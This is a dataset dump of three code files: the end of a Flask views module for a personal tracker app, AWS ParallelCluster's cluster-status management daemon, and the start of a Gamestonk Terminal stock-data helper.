category='success')\r\n return redirect(url_for('views.home'))\r\n\r\n\r\n@views.route(\"/trackerinfo/\", methods=[\"GET\", \"POST\"])\r\n@login_required\r\ndef trinfo(tid):\r\n if request.method == \"GET\":\r\n from .models import Tracker, Log\r\n logs = Log.query.filter(Log.tid == tid).all()\r\n tracker = Tracker.query.with_entities(\r\n Tracker.type, Tracker.name).filter(Tracker.id == tid).first()\r\n\r\n return render_template(\"trackerinfo.html\", tracker=tracker, user=current_user, logs=logs, tid=tid)\r\n\r\n\r\n@views.route('/edit-tracker/', methods=['GET', 'POST'])\r\n@login_required\r\ndef edit_tracker(tid):\r\n user = current_user.id\r\n from .models import Tracker\r\n tracker = Tracker.query.get(tid)\r\n\r\n from . 
import db\r\n trackers = db.session.query(Tracker).with_entities(\r\n Tracker.name, Tracker.id, Tracker.description).distinct().filter(Tracker.uid == user).all()\r\n if request.method == \"GET\":\r\n return render_template(\"edittracker.html\", user=current_user, tracker=tracker, tid=tid, trackers=trackers)\r\n\r\n if request.method == 'POST':\r\n type = request.form['Action']\r\n settings = request.form['settings']\r\n description = request.form['description']\r\n uid = current_user.id\r\n from . import db\r\n tracker.description = description\r\n tracker.type = type\r\n tracker.settings = settings\r\n db.session.commit()\r\n flash('Tracker Updated Successfully.', category='success')\r\n return redirect(url_for('views.home'))\r\n\r\n\r\n@views.route('/add-log/', methods=['GET', 'POST'])\r\n@login_required\r\ndef add_log(tid):\r\n from .models import Tracker, Log\r\n user = current_user.id\r\n tracker = Tracker.query.get(tid)\r\n logs = Log.query.filter(Log.tid == tid).all()\r\n import datetime\r\n now = datetime.datetime.now()\r\n options = []\r\n from . import db\r\n trackers = db.session.query(Tracker).with_entities(\r\n Tracker.name, Tracker.id, Tracker.description).distinct().filter(Tracker.uid == user).all()\r\n if tracker.type == \"multiple_choice\":\r\n option = tracker.settings\r\n options = option.split(',')\r\n\r\n if request.method == \"GET\":\r\n return render_template(\"addlog.html\", user=current_user, tracker=tracker, now=now, tid=tid, options=options, trackers=trackers, logs=logs)\r\n\r\n if request.method == 'POST':\r\n when = request.form['date']\r\n value = request.form['value']\r\n note = request.form['note']\r\n from . import db\r\n log_info = Log(timestamp=when, value=value, note=note,\r\n tid=tid, uid=current_user.id, added_date_time=now)\r\n db.session.add(log_info)\r\n db.session.commit()\r\n flash('New Log Added For ' + tracker.name +\r\n ' Tracker', category='success')\r\n return redirect(url_for('views.trinfo', tid=tid))\r\n\r\n\r\n@views.route('/edit-log/', methods=['GET', 'POST'])\r\n@login_required\r\ndef edit_log(lid):\r\n from .models import Log, Tracker\r\n from . import db\r\n options = []\r\n from . import db\r\n logs = Log.query.get(lid)\r\n all_logs = Log.query.filter(Log.tid == logs.tid).all()\r\n tracker = Tracker.query.get(logs.tid)\r\n user = current_user.id\r\n \r\n if tracker.type == \"multiple_choice\":\r\n option = tracker.settings\r\n options = option.split(',')\r\n\r\n if request.method == 'POST':\r\n when = request.form.get('date')\r\n value = request.form.get('value')\r\n note = request.form.get('note')\r\n\r\n\r\n logs.timestamp = when\r\n logs.value = value\r\n logs.note = note\r\n\r\n db.session.commit()\r\n\r\n return redirect(url_for('views.trinfo', tid=logs.tid))\r\n return render_template(\"editlog.html\", user=current_user, tracker=tracker, log=logs, tid=logs.tid, all_logs=all_logs, options=options)\r\n\r\n\r\n@views.route('/delete-log/', methods=['GET', 'POST'])\r\n@login_required\r\ndef delete_log(lid):\r\n from .models import Log\r\n loginfo = Log.query.get(lid)\r\n tid = loginfo.tid\r\n from . 
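# --- Editor's note: hedged sketch of how a views blueprint like the one above
# is usually wired into a Flask application factory. The `create_app` name and
# the package layout are assumptions, not taken from this repository.
from flask import Flask

def create_app():
    app = Flask(__name__)
    from .views import views  # assumed module path for the blueprint above
    app.register_blueprint(views)
    return app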
import db\r\n db.session.delete(loginfo)\r\n db.session.commit()\r\n return redirect(url_for('views.trinfo', tid=tid))\r\n","repo_name":"somyadipayan/QuantifiedSelf","sub_path":"webapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6702,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"71038934975","text":"import functools\nimport json\nimport logging\nimport os\nimport shlex\n\n# A nosec comment is appended to the following line in order to disable the B404 check.\n# In this file the input of the module subprocess is trusted.\nimport subprocess # nosec B404\nimport time\nfrom configparser import ConfigParser\nfrom datetime import datetime, timezone\nfrom enum import Enum\nfrom logging.config import fileConfig\n\nimport boto3\nfrom boto3.dynamodb.conditions import Attr\nfrom botocore.config import Config\n\nCONFIG_FILE_DIR = \"/etc/parallelcluster\"\nLOOP_TIME = 60\nlog = logging.getLogger(__name__)\n\n\n# Utils\ndef _seconds(sec):\n \"\"\"Convert seconds to milliseconds.\"\"\"\n return sec * 1000\n\n\ndef _minutes(min):\n \"\"\"Convert minutes to seconds.\"\"\"\n return min * 60\n\n\ndef _sleep_remaining_loop_time(total_loop_time, loop_start_time=None):\n end_time = datetime.now(tz=timezone.utc)\n if not loop_start_time:\n loop_start_time = end_time\n # Always convert the received loop_start_time to utc timezone. This is so that we never rely on the system local\n # time and risk to compare native datatime instances with localized ones\n loop_start_time = loop_start_time.astimezone(tz=timezone.utc)\n time_delta = (end_time - loop_start_time).total_seconds()\n if 0 <= time_delta < total_loop_time:\n time.sleep(total_loop_time - time_delta)\n\n\ndef log_exception(\n logger,\n action_desc,\n log_level=logging.ERROR,\n catch_exception=Exception,\n raise_on_error=True,\n exception_to_raise=None,\n):\n def decorator_log_exception(function):\n @functools.wraps(function)\n def wrapper_log_exception(*args, **kwargs): # pylint: disable=R1710\n try:\n return function(*args, **kwargs)\n except catch_exception as e:\n logger.log(log_level, \"Failed when %s with exception %s\", action_desc, e)\n if raise_on_error:\n if exception_to_raise:\n raise exception_to_raise\n raise\n return None\n\n return wrapper_log_exception\n\n return decorator_log_exception\n\n\ndef _run_command( # noqa: C901\n command,\n capture_output=False,\n log_error=True,\n env=None,\n timeout=None,\n raise_on_error=True,\n):\n \"\"\"Execute shell command.\"\"\"\n if isinstance(command, str):\n command = shlex.split(command)\n log_command = command if isinstance(command, str) else \" \".join(str(arg) for arg in command)\n log.info(\"Executing command: %s\", log_command)\n try:\n result = subprocess.run( # nosec - trusted input\n command,\n capture_output=capture_output,\n universal_newlines=True,\n encoding=\"utf-8\",\n env=env,\n timeout=timeout,\n check=False,\n )\n result.check_returncode()\n except subprocess.CalledProcessError:\n if log_error:\n log.error(\n \"Command %s failed\",\n log_command,\n )\n if raise_on_error:\n raise\n except subprocess.TimeoutExpired:\n if log_error:\n log.error(\"Command %s timed out after %s sec\", log_command, timeout)\n if raise_on_error:\n raise\n\n return result\n\n\ndef _write_json_to_file(filename, json_data):\n \"\"\"Write json to file.\"\"\"\n with open(filename, \"w\", encoding=\"utf-8\") as file:\n file.write(json.dumps(json_data))\n\n\nclass ComputeFleetStatus(Enum):\n \"\"\"Represents the status of the 
cluster compute fleet.\"\"\"\n\n STOPPED = \"STOPPED\" # Fleet is stopped, partitions are inactive.\n RUNNING = \"RUNNING\" # Fleet is running, partitions are active.\n STOPPING = \"STOPPING\" # clusterstatusmgtd is handling the stop request.\n STARTING = \"STARTING\" # clusterstatusmgtd is handling the start request.\n STOP_REQUESTED = \"STOP_REQUESTED\" # A request to stop the fleet has been submitted.\n START_REQUESTED = \"START_REQUESTED\" # A request to start the fleet has been submitted.\n # PROTECTED indicates that some partitions have consistent bootstrap failures. Affected partitions are inactive.\n PROTECTED = \"PROTECTED\"\n\n # cluster compute fleet mapping for status exposed to the update event handler\n EVENT_HANDLER_STATUS_MAPPING = {STOPPING: STOP_REQUESTED, STARTING: START_REQUESTED}\n UNKNOWN = \"UNKNOWN\"\n\n def __str__(self): # noqa: D105\n return str(self.value)\n\n @staticmethod\n def _transform_compute_fleet_data(compute_fleet_data):\n try:\n compute_fleet_data[\n ComputeFleetStatusManager.COMPUTE_FLEET_STATUS_ATTRIBUTE\n ] = ComputeFleetStatus.EVENT_HANDLER_STATUS_MAPPING.value.get(\n compute_fleet_data.get(ComputeFleetStatusManager.COMPUTE_FLEET_STATUS_ATTRIBUTE),\n str(ComputeFleetStatus.UNKNOWN),\n )\n return compute_fleet_data\n except AttributeError as e:\n raise Exception(f\"Unable to parse compute fleet status data: {e}\")\n\n @staticmethod\n def is_start_in_progress(status): # noqa: D102\n return status in {ComputeFleetStatus.START_REQUESTED, ComputeFleetStatus.STARTING}\n\n @staticmethod\n def is_stop_in_progress(status): # noqa: D102\n return status in {ComputeFleetStatus.STOP_REQUESTED, ComputeFleetStatus.STOPPING}\n\n @staticmethod\n def is_protected_status(status): # noqa: D102\n return status == ComputeFleetStatus.PROTECTED\n\n\nclass ComputeFleetStatusManager:\n \"\"\"\n Manages the compute fleet status store into the DynamoDB table.\n\n The value stored in the table is a json in the following form\n {\n \"status\": \"STOPPING\",\n \"lastStatusUpdatedTime\": \"2021-12-21 18:12:07.485674+00:00\",\n \"queues\": {\n \"queue_name1\": {\n \"status\": \"RUNNING\",\n \"lastStatusUpdatedTime\": \"2021-12-21 18:10:02.485674+00:00\",\n }\n }\n }\n \"\"\"\n\n DB_KEY = \"COMPUTE_FLEET\"\n DB_DATA = \"Data\"\n\n COMPUTE_FLEET_STATUS_ATTRIBUTE = \"status\"\n COMPUTE_FLEET_LAST_UPDATED_TIME_ATTRIBUTE = \"lastStatusUpdatedTime\"\n\n QUEUES_ATTRIBUTE = \"queues\"\n QUEUE_STATUS_ATTRIBUTE = \"status\"\n QUEUE_LAST_UPDATED_TIME_ATTRIBUTE = \"lastStatusUpdatedTime\"\n\n class ConditionalStatusUpdateFailedError(Exception):\n \"\"\"Raised when there is a failure in updating the status due to a change occurred after retrieving its value.\"\"\"\n\n pass\n\n class FleetDataNotFoundError(Exception):\n \"\"\"Raised when compute fleet data cannot be found in db table.\"\"\"\n\n pass\n\n def __init__(self, table_name, boto3_config, region):\n self._ddb_resource = boto3.resource(\"dynamodb\", region_name=region, config=boto3_config)\n self._table = self._ddb_resource.Table(table_name)\n\n def get_status(self): # noqa: D102\n compute_fleet_item = self._table.get_item(\n ConsistentRead=True,\n Key={\"Id\": self.DB_KEY},\n )\n if not compute_fleet_item or \"Item\" not in compute_fleet_item:\n raise ComputeFleetStatusManager.FleetDataNotFoundError(\"COMPUTE_FLEET data not found in db table\")\n\n log.debug(\"Found COMPUTE_FLEET data (%s)\", compute_fleet_item)\n return compute_fleet_item[\"Item\"].get(self.DB_DATA)\n\n def update_status(self, current_status, next_status): # noqa: 
D102\n try:\n updated_attributes = self._table.update_item(\n Key={\"Id\": self.DB_KEY},\n UpdateExpression=\"set #dt.#st=:s, #dt.#lut=:t\",\n ExpressionAttributeNames={\n \"#dt\": self.DB_DATA,\n \"#st\": self.COMPUTE_FLEET_STATUS_ATTRIBUTE,\n \"#lut\": self.COMPUTE_FLEET_LAST_UPDATED_TIME_ATTRIBUTE,\n },\n ExpressionAttributeValues={\n \":s\": str(next_status),\n \":t\": str(datetime.now(tz=timezone.utc)),\n },\n ConditionExpression=Attr(f\"{self.DB_DATA}.{self.COMPUTE_FLEET_STATUS_ATTRIBUTE}\").eq(\n str(current_status)\n ),\n ReturnValues=\"ALL_NEW\",\n )\n\n return updated_attributes.get(\"Attributes\").get(f\"{self.DB_DATA}\")\n except self._ddb_resource.meta.client.exceptions.ConditionalCheckFailedException as e:\n raise ComputeFleetStatusManager.ConditionalStatusUpdateFailedError(e)\n\n\nclass ClusterstatusmgtdConfig:\n \"\"\"Represents the cluster status management demon configuration.\"\"\"\n\n DEFAULTS = {\n \"max_retry\": 5,\n \"loop_time\": LOOP_TIME,\n \"proxy\": \"NONE\",\n \"logging_config\": os.path.join(os.path.dirname(__file__), \"clusterstatusmgtd_logging.conf\"),\n \"update_event_timeout_minutes\": 15,\n }\n\n def __init__(self, config_file_path):\n self._get_config(config_file_path)\n\n def __repr__(self): # noqa: D105\n attrs = \", \".join([f\"{key}={repr(value)}\" for key, value in self.__dict__.items()])\n return f\"{self.__class__.__name__}({attrs})\"\n\n def __eq__(self, other): # noqa: D105\n if type(other) is type(self):\n return self._config == other._config\n return False\n\n def __ne__(self, other): # noqa: D105\n return not self.__eq__(other)\n\n @log_exception(\n log, \"reading cluster status manger configuration file\", catch_exception=IOError, raise_on_error=True\n )\n def _get_config(self, config_file_path):\n \"\"\"Get clusterstatusmgtd configuration.\"\"\"\n log.info(\"Reading %s\", config_file_path)\n self._config = ConfigParser()\n with open(config_file_path, \"r\", encoding=\"utf-8\") as config_file:\n self._config.read_file(config_file)\n\n # Get config settings\n self._get_basic_config(self._config)\n\n def _get_basic_config(self, config):\n \"\"\"Get basic config options.\"\"\"\n self.region = config.get(\"clusterstatusmgtd\", \"region\")\n self.cluster_name = config.get(\"clusterstatusmgtd\", \"cluster_name\")\n self.dynamodb_table = config.get(\"clusterstatusmgtd\", \"dynamodb_table\")\n self.computefleet_status_path = config.get(\"clusterstatusmgtd\", \"computefleet_status_path\")\n self.logging_config = config.get(\n \"clusterstatusmgtd\", \"logging_config\", fallback=self.DEFAULTS.get(\"logging_config\")\n )\n self.loop_time = config.getint(\"clusterstatusmgtd\", \"loop_time\", fallback=self.DEFAULTS.get(\"loop_time\"))\n self.update_event_timeout_minutes = config.getint(\n \"clusterstatusmgtd\",\n \"update_event_timeout_minutes\",\n fallback=self.DEFAULTS.get(\"update_event_timeout_minutes\"),\n )\n\n # Configure boto3 to retry 1 times by default\n self._boto3_retry = config.getint(\"clusterstatusmgtd\", \"boto3_retry\", fallback=self.DEFAULTS.get(\"max_retry\"))\n self._boto3_config = {\"retries\": {\"max_attempts\": self._boto3_retry, \"mode\": \"standard\"}}\n # Configure proxy\n proxy = config.get(\"clusterstatusmgtd\", \"proxy\", fallback=self.DEFAULTS.get(\"proxy\"))\n if proxy != \"NONE\":\n self._boto3_config[\"proxies\"] = {\"https\": proxy}\n self.boto3_config = Config(**self._boto3_config)\n\n\nclass ClusterStatusManager:\n \"\"\"The cluster status manager.\"\"\"\n\n def __init__(self, config):\n \"\"\"Initialize 
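# --- Editor's note: the smallest configuration file that _get_basic_config()
# above can parse. Only the section and option names come from the code; every
# value below is a placeholder.
#
#   [clusterstatusmgtd]
#   region = us-east-1
#   cluster_name = mycluster
#   dynamodb_table = parallelcluster-mycluster
#   computefleet_status_path = /opt/parallelcluster/computefleet-status.json
#   # optional, falling back to DEFAULTS: loop_time, logging_config,
#   # update_event_timeout_minutes, boto3_retry, proxy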
ClusterStatusManager.\"\"\"\n self._config = None\n self._current_time = None\n self._compute_fleet_status_manager = None\n self._compute_fleet_status = ComputeFleetStatus.RUNNING\n self._compute_fleet_data = {}\n self.set_config(config)\n\n class ClusterStatusUpdateEventError(Exception):\n \"\"\"Raised when there is a failure in updating the status due to an error on update event handler execution.\"\"\"\n\n pass\n\n def set_config(self, config): # noqa: D102\n if self._config != config:\n log.info(\"Applying new clusterstatusmgtd config: %s\", config)\n self._config = config\n self._compute_fleet_status_manager = self._initialize_compute_fleet_status_manager(config)\n\n @staticmethod\n def _initialize_compute_fleet_status_manager(config):\n return ComputeFleetStatusManager(\n table_name=config.dynamodb_table, boto3_config=config.boto3_config, region=config.region\n )\n\n def _get_compute_fleet_status(self, fallback=None):\n try:\n log.info(\"Getting compute fleet status\")\n self._compute_fleet_data = self._compute_fleet_status_manager.get_status()\n\n return ComputeFleetStatus(\n self._compute_fleet_data.get(self._compute_fleet_status_manager.COMPUTE_FLEET_STATUS_ATTRIBUTE)\n )\n except Exception as e:\n log.error(\n \"Failed when retrieving computefleet status from DynamoDB with error %s, using fallback value %s\",\n e,\n fallback,\n )\n return fallback\n\n def _update_compute_fleet_status(self, new_status):\n log.info(\"Updating compute fleet status from %s to %s\", self._compute_fleet_status, new_status)\n self._compute_fleet_data = self._compute_fleet_status_manager.update_status(\n current_status=self._compute_fleet_status, next_status=new_status\n )\n self._compute_fleet_status = new_status\n\n def _call_update_event(self):\n try:\n compute_fleet_data = ComputeFleetStatus._transform_compute_fleet_data( # pylint: disable=W0212\n self._compute_fleet_data\n )\n _write_json_to_file(self._config.computefleet_status_path, compute_fleet_data)\n except Exception as e:\n log.error(\"Update event handler failed during fleet status translation: %s\", e)\n raise ClusterStatusManager.ClusterStatusUpdateEventError(e)\n\n cinc_log_file = \"/var/log/chef-client.log\"\n log.info(\"Calling update event handler, log can be found at %s\", cinc_log_file)\n cmd = (\n \"sudo cinc-client \"\n \"--local-mode \"\n \"--config /etc/chef/client.rb \"\n \"--log_level auto \"\n f\"--logfile {cinc_log_file} \"\n \"--force-formatter \"\n \"--no-color \"\n \"--chef-zero-port 8889 \"\n \"--json-attributes /etc/chef/dna.json \"\n \"--override-runlist aws-parallelcluster-entrypoints::update_computefleet_status\"\n )\n try:\n # The command being passed has been built from string literals and local variables and can be trusted.\n _run_command(cmd, self._config.update_event_timeout_minutes)\n except Exception as e:\n log.error(\"Update event handler failed. 
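# --- Editor's note: sketch of the JSON that the surrounding
# _call_update_event() writes to computefleet_status_path for the update event
# handler. Per EVENT_HANDLER_STATUS_MAPPING, a fleet in the transient STOPPING
# state is exposed as STOP_REQUESTED; the timestamp and queue name below are
# illustrative.
#
#   {"status": "STOP_REQUESTED",
#    "lastStatusUpdatedTime": "2021-12-21 18:12:07.485674+00:00",
#    "queues": {"queue1": {"status": "RUNNING", "lastStatusUpdatedTime": "..."}}}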
Check log file %s\", cinc_log_file)\n raise ClusterStatusManager.ClusterStatusUpdateEventError(e)\n\n def _update_status(self, request_status, in_progress_status, final_status):\n if self._compute_fleet_status == request_status:\n self._update_compute_fleet_status(in_progress_status)\n\n self._call_update_event()\n if self._compute_fleet_status == in_progress_status:\n self._update_compute_fleet_status(final_status)\n\n @log_exception(log, \"handling compute fleet status transitions\", catch_exception=Exception, raise_on_error=False)\n def manage_cluster_status(self):\n \"\"\"\n Manage cluster status.\n\n When running pcluster start/stop command the fleet status is set to START_REQUESTED/STOP_REQUESTED.\n The function fetches the current fleet status and performs the following transitions:\n - START_REQUESTED -> STARTING -> RUNNING\n - STOP_REQUESTED -> STOPPING -> STOPPED\n STARTING/STOPPING states are only used to communicate that the request is being processed by clusterstatusmgtd.\n On status STARTING|STOPPING, the update event handler baked by the recipe\n aws-parallelcluster-entrypoints::update_computefleet_status is called\n \"\"\"\n self._current_time = datetime.now(tz=timezone.utc)\n self._compute_fleet_status = self._get_compute_fleet_status(fallback=self._compute_fleet_status)\n log.info(\"Current compute fleet status: %s\", self._compute_fleet_status)\n try:\n if ComputeFleetStatus.is_stop_in_progress(self._compute_fleet_status):\n self._update_status(\n ComputeFleetStatus.STOP_REQUESTED, ComputeFleetStatus.STOPPING, ComputeFleetStatus.STOPPED\n )\n elif ComputeFleetStatus.is_start_in_progress(self._compute_fleet_status):\n self._update_status(\n ComputeFleetStatus.START_REQUESTED, ComputeFleetStatus.STARTING, ComputeFleetStatus.RUNNING\n )\n except ComputeFleetStatusManager.ConditionalStatusUpdateFailedError:\n log.warning(\n \"Cluster status was updated while handling a transition from %s. 
\"\n \"Status transition will be retried at the next iteration\",\n self._compute_fleet_status,\n )\n\n\ndef _run_clusterstatusmgtd(config_file):\n config = ClusterstatusmgtdConfig(config_file)\n cluster_status_manager = ClusterStatusManager(config=config)\n while True:\n # Get loop start time\n start_time = datetime.now(tz=timezone.utc)\n # Get program config\n try:\n config = ClusterstatusmgtdConfig(config_file)\n cluster_status_manager.set_config(config)\n except Exception as e:\n log.warning(\"Unable to reload daemon config from %s, using previous one.\\nException: %s\", config_file, e)\n # Configure root logger\n try:\n fileConfig(config.logging_config, disable_existing_loggers=False)\n except Exception as e:\n log.warning(\n \"Unable to configure logging from %s, using default logging settings.\\nException: %s\",\n config.logging_config,\n e,\n )\n # Manage cluster\n cluster_status_manager.manage_cluster_status()\n _sleep_remaining_loop_time(config.loop_time, start_time)\n\n\ndef retry(delay):\n def decorator_retry(func):\n @functools.wraps(func)\n def wrapper_retry(*args, **kwargs):\n while True:\n try:\n return func(*args, **kwargs)\n except Exception:\n time.sleep(delay)\n\n return wrapper_retry\n\n return decorator_retry\n\n\n@retry(LOOP_TIME)\ndef main():\n logging.basicConfig(\n level=logging.INFO, format=\"%(asctime)s - [%(module)s:%(funcName)s] - %(levelname)s - %(message)s\"\n )\n log.info(\"Clusterstatusmgtd Startup\")\n try:\n clusterstatusmgtd_config_file = os.environ.get(\n \"CONFIG_FILE\", os.path.join(CONFIG_FILE_DIR, \"clusterstatusmgtd.conf\")\n )\n _run_clusterstatusmgtd(clusterstatusmgtd_config_file)\n except Exception as e:\n log.exception(\"An unexpected error occurred: %s.\\nRestarting in %s seconds...\", e, LOOP_TIME)\n raise\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"aws/aws-parallelcluster-cookbook","sub_path":"cookbooks/aws-parallelcluster-computefleet/files/clusterstatusmgtd/clusterstatusmgtd.py","file_name":"clusterstatusmgtd.py","file_ext":"py","file_size_in_byte":19024,"program_lang":"python","lang":"en","doc_type":"code","stars":98,"dataset":"github-code","pt":"79"} +{"seq_id":"6532096882","text":"\"\"\"Main helper\"\"\"\n__docformat__ = \"numpy\"\nimport argparse\nimport json\nfrom datetime import datetime, timedelta\nfrom typing import List, Union\n\nimport matplotlib.pyplot as plt\nimport mplfinance as mpf\nimport pandas as pd\nimport plotly.graph_objects as go\nimport pyEX\nimport pytz\nimport requests\nimport yfinance as yf\nfrom alpha_vantage.timeseries import TimeSeries\nfrom numpy.core.fromnumeric import transpose\nfrom plotly.subplots import make_subplots\nfrom scipy import stats\nfrom tabulate import tabulate\n\nfrom gamestonk_terminal import config_terminal as cfg\nfrom gamestonk_terminal import feature_flags as gtff\nfrom gamestonk_terminal.helper_funcs import (\n parse_known_args_and_warn,\n plot_autoscale,\n try_except,\n)\n\n# pylint: disable=no-member,too-many-branches,C0302\n\nINTERVALS = [1, 5, 15, 30, 60]\nSOURCES = [\"yf\", \"av\", \"iex\"]\n\n\n@try_except\ndef search(\n query: str,\n amount: int,\n):\n \"\"\"Search selected query for tickers.\n\n Parameters\n ----------\n query : str\n The search term used to find company tickers.\n amount : int\n The amount of companies shown.\n\n Returns\n -------\n tabulate\n Companies that match the query.\n \"\"\"\n equities_list = (\n \"https://raw.githubusercontent.com/JerBouma/FinanceDatabase/master/\"\n \"Database/Equities/Equities List.json\"\n )\n request = 
requests.get(equities_list)\n equities = json.loads(request.text)\n\n equities_query = {\n key: value\n for key, value in equities.items()\n if (query in key.lower()) or (query in value.lower())\n }\n\n equities_dataframe = pd.DataFrame(\n equities_query.items(),\n index=equities_query.values(),\n columns=[\"Company\", \"Ticker\"],\n )\n\n if equities_dataframe.empty:\n raise ValueError(\"No companies found. \\n\")\n\n if gtff.USE_TABULATE_DF:\n print(\n tabulate(\n equities_dataframe.iloc[:amount],\n showindex=False,\n headers=[\"Company\", \"Ticker\"],\n tablefmt=\"fancy_grid\",\n ),\n \"\\n\",\n )\n else:\n print(equities_dataframe.iloc[:amount].to_string(), \"\\n\")\n\n\n@try_except\ndef load(\n ticker: str,\n start: datetime = (datetime.now() - timedelta(days=366)),\n interval: int = 1440,\n end: datetime = datetime.now(),\n prepost: bool = False,\n source: str = \"yf\",\n iexrange: str = \"ytd\",\n):\n \"\"\"\n Load a symbol to perform analysis using the string above as a template. Optional arguments and their\n descriptions are listed above. The default source is, yFinance (https://pypi.org/project/yfinance/).\n Alternatively, one may select either AlphaVantage (https://www.alphavantage.co/documentation/)\n or IEX Cloud (https://iexcloud.io/docs/api/) as the data source for the analysis.\n Please note that certain analytical features are exclusive to the source.\n\n To load a symbol from an exchange outside of the NYSE/NASDAQ default, use yFinance as the source and\n add the corresponding exchange to the end of the symbol. i.e. ‘BNS.TO’.\n\n BNS is a dual-listed stock, there are separate options chains and order books for each listing.\n Opportunities for arbitrage may arise from momentary pricing discrepancies between listings\n with a dynamic exchange rate as a second order opportunity in ForEx spreads.\n\n Find the full list of supported exchanges here:\n https://help.yahoo.com/kb/exchanges-data-providers-yahoo-finance-sln2310.html\n\n Certain analytical features, such as VWAP, require the ticker to be loaded as intraday\n using the ‘-i x’ argument. When encountering this error, simply reload the symbol using\n the interval argument. i.e. ‘load -t BNS -s YYYY-MM-DD -i 1 -p’ loads one-minute intervals,\n including Pre/After Market data, using the default source, yFinance.\n\n Certain features, such as the Prediction menu, require the symbol to be loaded as daily and not intraday.\n\n Parameters\n ----------\n ticker: str\n Ticker to get data\n start: datetime\n Start date to get data from with\n interval: int\n Interval (in minutes) to get data 1, 5, 15, 30, 60 or 1440\n end: datetime\n End date to get data from with\n prepost: bool\n Pre and After hours data\n source: str\n Source of data extracted\n iexrange: str\n Timeframe to get IEX data.\n\n Returns\n -------\n df_stock_candidate: pd.DataFrame\n Dataframe of data\n \"\"\"\n\n # Daily\n if interval == 1440:\n\n # Alpha Vantage Source\n if source == \"av\":\n ts = TimeSeries(key=cfg.API_KEY_ALPHAVANTAGE, output_format=\"pandas\")\n # pylint: disable=unbalanced-tuple-unpacking\n df_stock_candidate, _ = ts.get_daily_adjusted(\n symbol=ticker, outputsize=\"full\"\n )\n\n df_stock_candidate.columns = [\n val.split(\". 
\")[1].capitalize() for val in df_stock_candidate.columns\n ]\n\n df_stock_candidate = df_stock_candidate.rename(\n columns={\n \"Adjusted close\": \"Adj Close\",\n }\n )\n\n # Check that loading a stock was not successful\n # pylint: disable=no-member\n if df_stock_candidate.empty:\n return pd.DataFrame()\n\n df_stock_candidate.index = df_stock_candidate.index.tz_localize(None)\n\n # pylint: disable=no-member\n df_stock_candidate.sort_index(ascending=True, inplace=True)\n\n # Slice dataframe from the starting date YYYY-MM-DD selected\n df_stock_candidate = df_stock_candidate[\n (df_stock_candidate.index >= start.strftime(\"%Y-%m-%d\"))\n & (df_stock_candidate.index <= end.strftime(\"%Y-%m-%d\"))\n ]\n\n # Yahoo Finance Source\n elif source == \"yf\":\n df_stock_candidate = yf.download(\n ticker,\n start=start,\n end=end,\n progress=False,\n )\n\n # Check that loading a stock was not successful\n if df_stock_candidate.empty:\n return pd.DataFrame()\n\n df_stock_candidate.index.name = \"date\"\n\n # IEX Cloud Source\n elif source == \"iex\":\n client = pyEX.Client(api_token=cfg.API_IEX_TOKEN, version=\"v1\")\n\n df_stock_candidate = client.chartDF(ticker, timeframe=iexrange)\n\n # Check that loading a stock was not successful\n if df_stock_candidate.empty:\n return pd.DataFrame()\n\n df_stock_candidate = df_stock_candidate[\n [\"close\", \"fHigh\", \"fLow\", \"fOpen\", \"fClose\", \"volume\"]\n ]\n df_stock_candidate = df_stock_candidate.rename(\n columns={\n \"close\": \"Close\",\n \"fHigh\": \"High\",\n \"fLow\": \"Low\",\n \"fOpen\": \"Open\",\n \"fClose\": \"Adj Close\",\n \"volume\": \"Volume\",\n }\n )\n\n df_stock_candidate.sort_index(ascending=True, inplace=True)\n s_start = df_stock_candidate.index[0]\n s_interval = f\"{interval}min\"\n\n else:\n\n s_int = str(interval) + \"m\"\n s_interval = s_int + \"in\"\n d_granularity = {\"1m\": 6, \"5m\": 59, \"15m\": 59, \"30m\": 59, \"60m\": 729}\n\n s_start_dt = datetime.utcnow() - timedelta(days=d_granularity[s_int])\n s_date_start = s_start_dt.strftime(\"%Y-%m-%d\")\n\n df_stock_candidate = yf.download(\n ticker,\n start=s_date_start if s_start_dt > start else start.strftime(\"%Y-%m-%d\"),\n progress=False,\n interval=s_int,\n prepost=prepost,\n )\n\n # Check that loading a stock was not successful\n if df_stock_candidate.empty:\n return pd.DataFrame()\n\n df_stock_candidate.index = df_stock_candidate.index.tz_localize(None)\n\n if s_start_dt > start:\n s_start = pytz.utc.localize(s_start_dt)\n else:\n s_start = start\n\n df_stock_candidate.index.name = \"date\"\n\n s_intraday = (f\"Intraday {s_interval}\", \"Daily\")[interval == 1440]\n\n print(\n f\"Loading {s_intraday} {ticker.upper()} stock \"\n f\"with starting period {s_start.strftime('%Y-%m-%d')} for analysis.\\n\"\n )\n\n return df_stock_candidate\n\n\ndef display_candle(\n s_ticker: str, df_stock: pd.DataFrame, use_matplotlib: bool, intraday: bool = False\n):\n \"\"\"Shows candle plot of loaded ticker. 
[Source: Yahoo Finance, IEX Cloud or Alpha Vantage]\n\n Parameters\n ----------\n df_stock: pd.DataFrame\n Stock dataframe\n s_ticker: str\n Ticker name\n use_matplotlib: bool\n Flag to use matplotlib instead of interactive plotly chart\n intraday: bool\n Flag for intraday data for plotly range breaks\n \"\"\"\n if (df_stock.index[1] - df_stock.index[0]).total_seconds() >= 86400:\n df_stock = find_trendline(df_stock, \"OC_High\", \"high\")\n df_stock = find_trendline(df_stock, \"OC_Low\", \"low\")\n\n if use_matplotlib:\n mc = mpf.make_marketcolors(\n up=\"green\",\n down=\"red\",\n edge=\"black\",\n wick=\"black\",\n volume=\"in\",\n ohlc=\"i\",\n )\n\n s = mpf.make_mpf_style(marketcolors=mc, gridstyle=\":\", y_on_right=True)\n\n ap0 = []\n\n if \"OC_High_trend\" in df_stock.columns:\n ap0.append(\n mpf.make_addplot(df_stock[\"OC_High_trend\"], color=\"g\"),\n )\n\n if \"OC_Low_trend\" in df_stock.columns:\n ap0.append(\n mpf.make_addplot(df_stock[\"OC_Low_trend\"], color=\"b\"),\n )\n\n if gtff.USE_ION:\n plt.ion()\n\n mpf.plot(\n df_stock,\n type=\"candle\",\n mav=(20, 50),\n volume=True,\n title=f\"\\nStock {s_ticker}\",\n addplot=ap0,\n xrotation=10,\n style=s,\n figratio=(10, 7),\n figscale=1.10,\n figsize=(plot_autoscale()),\n update_width_config=dict(\n candle_linewidth=1.0, candle_width=0.8, volume_linewidth=1.0\n ),\n )\n else:\n fig = make_subplots(\n rows=2,\n cols=1,\n shared_xaxes=True,\n vertical_spacing=0.06,\n 